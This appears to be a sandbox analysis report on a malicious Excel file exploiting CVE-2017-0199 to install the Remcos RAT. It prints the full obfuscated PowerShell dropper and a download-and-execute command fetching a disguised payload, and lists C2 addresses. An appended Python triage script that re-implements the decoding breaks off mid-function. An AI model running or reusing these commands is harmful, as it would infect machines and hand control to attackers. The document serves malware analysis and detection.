Windows Analysis Report
SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
Analysis ID:1500777
MD5:4d86c48b5d9f043b6e0b1ef3d2c7bdd4
SHA1:9206cc3a88ac7f737bdac86649905a9978443109
SHA256:33ac27d5d62b88cda7ee122abcd3209306e9527ab0b9dea5633572d8f3908bdd
Tags:xlsx

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3604 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3816 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3096 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3208 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? 
? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? 
? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? 
? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? 
? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?Ec? ? ? ? ?RwBS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?w? ? ? ? ?DY? ? ? ? ?Lw? ? ? ? ?4? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dg? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 2496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2580 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

{
  "Host:Port:Password": "192.3.101.172:2404:1192.3.101.172:9674:1",
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-4CT19T",
  "Keylog flag": "0",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
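The decoding chain shown in the process tree, re-implemented as an offline triage script. This is an added example and not code from the sample, from Joe Sandbox or from any project named in the report. Stage 1 (PID 3308) restores 'A' in the base64 blob and decodes it as UTF-16LE; stage 2 (PID 2900) carves a .NET assembly out of the fetched "image" between the literal <<BASE64_START>> and <<BASE64_END>> markers, and its guard `$startIndex -ge 0 -and $endIndex -gt $startIndex` is a bare expression that never aborts, so the example raises instead; the loader's first argument 'txt.VGGR/006/822.18.21.891//:ptth' read backwards is http://198.12.81.228/600/RGGV.txt, the same host EQNEDT32.EXE contacted on TCP/80; and the concatenated "Host:Port:Password" field of the extracted configuration is split into its two entries. The placeholder token, the stand-in stage-2 script and the fake payload are constructed for the example (the real placeholder renders as '? ? ? ? ?' in the report), and nothing is fetched from the network.

```python
"""Offline re-implementation of the decoding chain in the process tree and a
splitter for the Remcos C2 field. Added example; not code from the sample, the
sandbox or any project it names. Nothing here touches the network."""
import base64
import re
from typing import List, Tuple

# --- Stage 1 (PID 3308) -------------------------------------------------------
# The blob is base64 of a UTF-16LE script in which every 'A' was swapped for a
# placeholder. ASCII text in UTF-16LE has a zero byte in every other position
# and zero bits encode as 'A', so the blob is dense with 'A'; hiding it defeats
# naive base64 detection. The token below is an assumption for this example
# (the report renders the real one as '? ? ? ? ?').
PLACEHOLDER = "#@#"


def build_stage1_blob(script: str, placeholder: str = PLACEHOLDER) -> str:
    """Obfuscate a script the way the dropper does (used to build test input)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", placeholder)


def decode_stage1(blob: str, placeholder: str = PLACEHOLDER) -> str:
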